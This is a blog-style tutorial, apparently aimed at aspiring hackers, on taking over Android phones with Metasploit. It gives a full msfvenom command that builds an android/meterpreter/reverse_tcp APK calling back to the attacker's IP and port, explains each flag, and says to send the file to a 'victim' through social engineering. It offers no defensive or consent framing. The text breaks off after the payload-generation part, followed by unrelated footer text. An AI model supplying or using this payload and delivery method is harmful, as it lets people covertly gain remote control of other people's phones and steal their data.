How to hack Android Devices? A Metasploite trick.

Undoubtedly one of the most sought after things by all the Wannabe Hackers out there. If you ever even mistakenly told someone that you’re into hacking, as a result there are 3 prominent questions you’ll definitely face. Can you hack into phones or particularly hack Android smartphones? Can you hack Facebook(or similarly any other social media for that matter, lol)? and lastly, Can you hack WiFi?  And if you can suffice to any one of those, Congratulations! Seems like you are almost certainly a Hacker . Well, atleast (and only!) among those naive friends of yours.

Regardless of all that mocking, don’t get me wrong. To be able to easily hack Android devices is one of the most crucial and important part of your Hacker Skill-set. Probably for the reason that it’s just too huge a platform to be missed out on! While it’s just that people tend to forget that it’s just a “part“! But nonetheless it’s absolute fun! isn’t it? So without further a due, let’s get started…


Things you’ll need:

1. Kali Linux

2. Metasploit and MSFVenom: Included frameworks in Kali Linux

2. An Android Device(Victim)

3. Some Social Engineering skills

4. Curiosity and a sharp Brain

What is Metasploit and MSFVenom?

So, today I’ll show one of the most easy and famous methods to hack Android devices using Metasploit. According to Wikipedia, “The Metasploit Project” is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development”. Basically, Metasploit is a Framework providing a Pentesting software platform for Developing, Testing and and Executing exploits. Likewise, MSFVenom, a subpart(Framework Instance) of Metasploit, an integration of two original individual framework instances, msfconsole and msfencode. Just remember it simply helps to create extremely powerful Malicious Payloads(not just for Android hacking but for a hell lot more!) and the ability to encode them.

How to use MSFVenom to hack Android devices?

So there are basically 2 steps involved here to be able to successfully hack Android Devices : Generation of the Payload and Starting up a Listener.

How to Hack Android Devices |

Part 1: Generating the Payload

1. Fire up your Kali and Open a Terminal.
2. Copy your Internal IP Address.(Note: You might have something other than wlan0 for inet. Don’t worry it’s just the network interface!)
3. Enter the following commands in a new terminal to generate the Reverse TCP Payload.(Note: Replace the LHOST with your internal IP from Step 2)
4."msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.213 LPORT=4444 R >/root/Desktop/FILENAME.apk"     
• -p : Specify Payload     
• LHOST : Your ip address     
• LPORT : Listening Port number     
• R : RAW Format     
• >/root/Desktop/FILENAME.apk => Location to save the Payload

NOTE :- YOUR IP ADDRESS CAN BE DIFFERENT SO DON'T COPY MINE OR IT WILL NOT WORK.
So, That’s it! You’re almost halfway into hacking that badass Android device! Just send your Payload to the Victim(Using some Social Engineering :P). And your Payload is ready to create Mayhem.



Enjoy! Follow us for more...

No comments:

Post a Comment

How to Install files and the database in MAMP Server.mp4

  Download now   Enjoy! Follow us for more...